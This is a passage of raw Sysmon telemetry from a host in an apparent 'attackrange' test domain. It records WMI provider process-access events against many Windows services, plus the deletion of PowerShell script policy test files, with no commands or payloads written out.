m32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243129Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243128Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243127Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243126Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243125Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243124Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243123Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243122Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243121Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243120Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243119Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243118Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243117Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243116Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.475{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6DD3-603E-DFAA-00000000AD01}11172C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243115Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.475{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6DD3-603E-DFAA-00000000AD01}11172C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243114Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002243113Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.475{05ADC7E1-6DD3-603E-DCAA-00000000AD01}11576ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_nxl0uorz.utr.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243112Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243111Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002243110Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.475{05ADC7E1-6DD3-603E-DCAA-00000000AD01}11576ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_j4entlpu.2xp.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243109Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243108Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243107Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 